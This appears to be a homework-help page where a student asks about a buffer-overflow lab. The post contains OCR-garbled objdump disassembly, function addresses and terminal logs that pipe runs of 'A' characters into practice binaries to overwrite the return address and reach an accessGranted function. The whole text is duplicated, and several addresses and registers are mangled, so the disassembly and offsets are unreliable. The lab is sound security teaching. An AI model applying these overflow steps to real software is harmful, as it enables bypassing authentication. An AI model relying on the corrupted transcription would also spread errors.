Answered step by step
Verified Expert Solution
Link Copied!

Question

1 Approved Answer

I get the segmentation fault but I was unable to get the access granted ... Can anyone help? For this lab, You will find two

I get the segmentation fault but I was unable to get the access granted ... Can anyone help?

For this lab, You will find two executable files there: buffer_oflow1 and buffer_oflow2. Use the process shown in the video to overflow the buffer that is used to grab the password field in the main() function in order to overwrite the return pointer and execute the accessGranted function.

Task 3: You need to overflow the input buffer for the buffer_oflow1 and buffer_oflow2 programs and get the Access Granted! message without entering the correct password.

Task 4: What is the last name of the author quoted in the accessGranted function of the buffer_oflow2 program?

Task 5: Assuming that you have successfully overflowed the return pointer and executed the accessGranted function of the buffer_oflow2 program, why is there another Segmentation Fault after the massage is printed? [Hint: how would the value of the return address for the accessGranted function normally get placed in

image text in transcribed

image text in transcribedimage text in transcribedimage text in transcribed

For this lab, You will find two executable files there: buffer oflowl and buffer oflow2. Use the process shown in the video to overflow the buffer that is used to grab the password field in the main() function in order to overwrite the return pointer and execute the access Granted' function. Terminal - studentamuneebahmed: -/lab1/buffer_oflow File Edit View Terminal Tabs Help student@muneebahmed:-/lab1/buffer_oflow$ ./buffer_oflowl Enter password: password Access Denied. Studentamuneebahmed:-/lab/buffer of low$ studentenuneebahmed:-/1ab1/buffer of low$ ./buffer_oflowl Enter password: $3cr3t Access Granted! "Progress isn't made by early risers. It's made by lazy men trying to find easier ways to do something." Robert Heinlein student muneebahmed:-/labi/buffer of low$I Task 1: In the buffer_oflowl and buffer_oflow2 programs, what is the address of the accessGranted function? (Hint: use the Linux obidume utility here The address for buffer oflowl is "080484ac" as shown in the screenshot below: 80484a2: e9 79 ff ff 80484a7: e9 74 ff ff 080484ac : 80484ac: 55 8049Aad 90A5 The address for is 080484c5 for buffer_oflow2 programs as shown below in the screenshot. 080484c5 : 8048405: 55 Task 2: How many bytes (how may 'A's) are required to overflow the input buffer for the buffer_oflowl and buffer_oflow2 programs? After trying out many A's I found out that 90 A's are required to overflow the input buffer for the buffer_oflowl. As shown and highlighted in the screenshot below studentmuneebahmed:-/lab1/buffer_oflow$ python -c 'print "A"*70' | ./buffer_oflowl Enter password: Access Denied student@muneebahmed:-/lab1/buffer_oflow$ python -c 'print "A"*40 | .buffer_oflow1 .buffer_oflowl: command not found student@muneebahmed:-/lab1/buffer_oflow$ python -c 'print "A"*40 | /.buffer_oflowl bash: /.buffer_oflowl: No such file or directory close failed in file object destructor: sys.excepthook is missing lost sys.stderr student@muneebahmed:-/lab1/buffer_oflow$ python -C 'print "A"*40 1 ./buffer_oflowl Enter password: Access Denied ... student@muneebahmed:-/labl/buffer_oflow$ python -c 'print "A"*90 1./buffer_oflowl Enter password: Access Denied Segmentation fault (core dumped) studentamuneahahmede-/labi/huffer nflow Task 3: You need to overflow the input buffer for the buffer_oflowl and buffer_oflow2 programs and get the "Access Granted!" message without entering the correct password. Task 4: What is the last name of the author quoted in the accessGranted function of the buffer_oflow2 program? Task 5: Assuming that you have successfully overflowed the return pointer and executed the accessGranted function of the buffer_oflow2 program, why is there another Segmentation Eault after the massage is printed into how would the value of the return 08048521
: 8048521: 55 8048522: 89 e5 8048524: 83 e4 fo 8048527: 83 ec 60 804852a: c7 04 24 97 86 04 08 8048531: e8 3a fe ff ff 8048536: 8d 44 24 la 804853a: 89 04 24 8048530: e8 3e fe ff ff 8048542: 8d 44 24 la 8048546: 89 04 24 8048549: e8 a8 ff ff ff 804854e: b8 00 00 00 00 8048553: c9 8048554: c3 8048555: 90 8048556: 90 8048557: 90 8048558: 90 8048559: 90 804855a: 90 804855b: 90 804855c: 90 804855d: 90 804855e: 90 804855f: 90 %ebp %esp, Sebp $0xfffffff0,%esp $0x60,%esp $0x8048697, (esp) 8048370 Oxla (esp), %eax Seax, (%esp) 8048380 Oxla(esp), %eax Seax, (fesp) 80484f6 $0x0, %eax push mov and sub movl call lea mov call lea mov call mov leave ret nop nop nop nop nop nop nop nop nop nop nop 080484ac : 80484ac: 55 80484ad: 89 e5 80484af: 83 ec 18 80484b2: c7 04 24 fo 85 04 08 80484b9: e8 d2 fe ff ff 80484be: c7 04 24 00 86 04 08 80484c5: e8 c6 fe ff ff 80484ca: c7 04 24 69 86 04 08 80484d1: e8 ba fe ff ff 80484d6: b8 00 00 00 00 80484db: c9 80484dc: c3 push mov sub movl call movl call movl call mov leave ret %ebp %esp, %ebp $0x18, %esp $0x80485f0, (%esp) 8048390 $0x8048600, (esp) 8048390 $0x8048669, (%esp) 8048390 $0x0, %eax 080484dd : 80484dd: 55 80484de: 89 e5 8048400: 83 ec 18 80484e3: c7 04 24 7b 86 04 08 80484ea: e8 al fe ff ff 80484ef: b8 00 00 00 00 80484f4; c9 80484f5: C3 push mov sub movl call mov leave ret %ebp %esp, Sebp $0x18, %esp $0x804867b, (fesp) 8048390 $0x0,%eax push mov sub movl %ebp %esp, %ebp $0x18,%esp $0x8048690, 0x4(%esp) 080484f6 : 80484f6: 55 80484f7: 89 e5 80484f9: 83 ec 18 80484fc: c7 44 24 04 90 86 04 8048503: 08 8048504: 8b 45 08 8048507: 89 04 24 804850a: e8 51 fe ff ff 804850f: 85 c0 8048511: 75 07 8048513: e8 94 ff ff ff 8048518: eb 05 804851a: e8 be ffffff 804851f: c9 8048520: C3 mov mov call test jne call jmp call leave ret 0x8(%ebp),%eax %eax, (%esp) 8048360 %eax, %eax 804851a 80484ac 804851f 80484dd | ./buffer_oflowl Enter password: Access Denied student@ip-10-1-147-81:-/lab1/buffer_oflow$ student@ip-10-1-147-81:-/lab1/buffer_oflow$ python -C 'print "A"*40 Enter password: Access Denied student@ip-10-1-147-81:-/lab1/buffer_oflows student@ip-10-1-147-81:-/lab1/buffer_oflow$ python -c 'print "A"*90 Enter password: Access Denied Segmentation fault (core dumped) | ./buffer_oflow1 + student@ip-10-1-147-81:-/lab1/buffer_oflow$ student@ip-10-1-147-81:-/lab1/buffer_oflow$ python -C 'print "A" | ./buffer_oflowl Enter password: Access Denied ... Access Granted! "Progress isn't made by early risers. It's made by lazy men trying to find easier ways to do something.' - Robert Heinlein Segmentation fault (core dumped) student@ip-10-1-147-81:-/lab1/buffer oflow$ For this lab, You will find two executable files there: buffer oflowl and buffer oflow2. Use the process shown in the video to overflow the buffer that is used to grab the password field in the main() function in order to overwrite the return pointer and execute the access Granted' function. Terminal - studentamuneebahmed: -/lab1/buffer_oflow File Edit View Terminal Tabs Help student@muneebahmed:-/lab1/buffer_oflow$ ./buffer_oflowl Enter password: password Access Denied. Studentamuneebahmed:-/lab/buffer of low$ studentenuneebahmed:-/1ab1/buffer of low$ ./buffer_oflowl Enter password: $3cr3t Access Granted! "Progress isn't made by early risers. It's made by lazy men trying to find easier ways to do something." Robert Heinlein student muneebahmed:-/labi/buffer of low$I Task 1: In the buffer_oflowl and buffer_oflow2 programs, what is the address of the accessGranted function? (Hint: use the Linux obidume utility here The address for buffer oflowl is "080484ac" as shown in the screenshot below: 80484a2: e9 79 ff ff 80484a7: e9 74 ff ff 080484ac : 80484ac: 55 8049Aad 90A5 The address for is 080484c5 for buffer_oflow2 programs as shown below in the screenshot. 080484c5 : 8048405: 55 Task 2: How many bytes (how may 'A's) are required to overflow the input buffer for the buffer_oflowl and buffer_oflow2 programs? After trying out many A's I found out that 90 A's are required to overflow the input buffer for the buffer_oflowl. As shown and highlighted in the screenshot below studentmuneebahmed:-/lab1/buffer_oflow$ python -c 'print "A"*70' | ./buffer_oflowl Enter password: Access Denied student@muneebahmed:-/lab1/buffer_oflow$ python -c 'print "A"*40 | .buffer_oflow1 .buffer_oflowl: command not found student@muneebahmed:-/lab1/buffer_oflow$ python -c 'print "A"*40 | /.buffer_oflowl bash: /.buffer_oflowl: No such file or directory close failed in file object destructor: sys.excepthook is missing lost sys.stderr student@muneebahmed:-/lab1/buffer_oflow$ python -C 'print "A"*40 1 ./buffer_oflowl Enter password: Access Denied ... student@muneebahmed:-/labl/buffer_oflow$ python -c 'print "A"*90 1./buffer_oflowl Enter password: Access Denied Segmentation fault (core dumped) studentamuneahahmede-/labi/huffer nflow Task 3: You need to overflow the input buffer for the buffer_oflowl and buffer_oflow2 programs and get the "Access Granted!" message without entering the correct password. Task 4: What is the last name of the author quoted in the accessGranted function of the buffer_oflow2 program? Task 5: Assuming that you have successfully overflowed the return pointer and executed the accessGranted function of the buffer_oflow2 program, why is there another Segmentation Eault after the massage is printed into how would the value of the return 08048521
: 8048521: 55 8048522: 89 e5 8048524: 83 e4 fo 8048527: 83 ec 60 804852a: c7 04 24 97 86 04 08 8048531: e8 3a fe ff ff 8048536: 8d 44 24 la 804853a: 89 04 24 8048530: e8 3e fe ff ff 8048542: 8d 44 24 la 8048546: 89 04 24 8048549: e8 a8 ff ff ff 804854e: b8 00 00 00 00 8048553: c9 8048554: c3 8048555: 90 8048556: 90 8048557: 90 8048558: 90 8048559: 90 804855a: 90 804855b: 90 804855c: 90 804855d: 90 804855e: 90 804855f: 90 %ebp %esp, Sebp $0xfffffff0,%esp $0x60,%esp $0x8048697, (esp) 8048370 Oxla (esp), %eax Seax, (%esp) 8048380 Oxla(esp), %eax Seax, (fesp) 80484f6 $0x0, %eax push mov and sub movl call lea mov call lea mov call mov leave ret nop nop nop nop nop nop nop nop nop nop nop 080484ac : 80484ac: 55 80484ad: 89 e5 80484af: 83 ec 18 80484b2: c7 04 24 fo 85 04 08 80484b9: e8 d2 fe ff ff 80484be: c7 04 24 00 86 04 08 80484c5: e8 c6 fe ff ff 80484ca: c7 04 24 69 86 04 08 80484d1: e8 ba fe ff ff 80484d6: b8 00 00 00 00 80484db: c9 80484dc: c3 push mov sub movl call movl call movl call mov leave ret %ebp %esp, %ebp $0x18, %esp $0x80485f0, (%esp) 8048390 $0x8048600, (esp) 8048390 $0x8048669, (%esp) 8048390 $0x0, %eax 080484dd : 80484dd: 55 80484de: 89 e5 8048400: 83 ec 18 80484e3: c7 04 24 7b 86 04 08 80484ea: e8 al fe ff ff 80484ef: b8 00 00 00 00 80484f4; c9 80484f5: C3 push mov sub movl call mov leave ret %ebp %esp, Sebp $0x18, %esp $0x804867b, (fesp) 8048390 $0x0,%eax push mov sub movl %ebp %esp, %ebp $0x18,%esp $0x8048690, 0x4(%esp) 080484f6 : 80484f6: 55 80484f7: 89 e5 80484f9: 83 ec 18 80484fc: c7 44 24 04 90 86 04 8048503: 08 8048504: 8b 45 08 8048507: 89 04 24 804850a: e8 51 fe ff ff 804850f: 85 c0 8048511: 75 07 8048513: e8 94 ff ff ff 8048518: eb 05 804851a: e8 be ffffff 804851f: c9 8048520: C3 mov mov call test jne call jmp call leave ret 0x8(%ebp),%eax %eax, (%esp) 8048360 %eax, %eax 804851a 80484ac 804851f 80484dd | ./buffer_oflowl Enter password: Access Denied student@ip-10-1-147-81:-/lab1/buffer_oflow$ student@ip-10-1-147-81:-/lab1/buffer_oflow$ python -C 'print "A"*40 Enter password: Access Denied student@ip-10-1-147-81:-/lab1/buffer_oflows student@ip-10-1-147-81:-/lab1/buffer_oflow$ python -c 'print "A"*90 Enter password: Access Denied Segmentation fault (core dumped) | ./buffer_oflow1 + student@ip-10-1-147-81:-/lab1/buffer_oflow$ student@ip-10-1-147-81:-/lab1/buffer_oflow$ python -C 'print "A" | ./buffer_oflowl Enter password: Access Denied ... Access Granted! "Progress isn't made by early risers. It's made by lazy men trying to find easier ways to do something.' - Robert Heinlein Segmentation fault (core dumped) student@ip-10-1-147-81:-/lab1/buffer oflow$

Step by Step Solution

There are 3 Steps involved in it

Step: 1

blur-text-image

Get Instant Access to Expert-Tailored Solutions

See step-by-step solutions with expert insights and AI powered tools for academic success

Step: 2

blur-text-image

Step: 3

blur-text-image

Ace Your Homework with AI

Get the answers you need in no time with our AI-driven, step-by-step assistance

Get Started

Students also viewed these Databases questions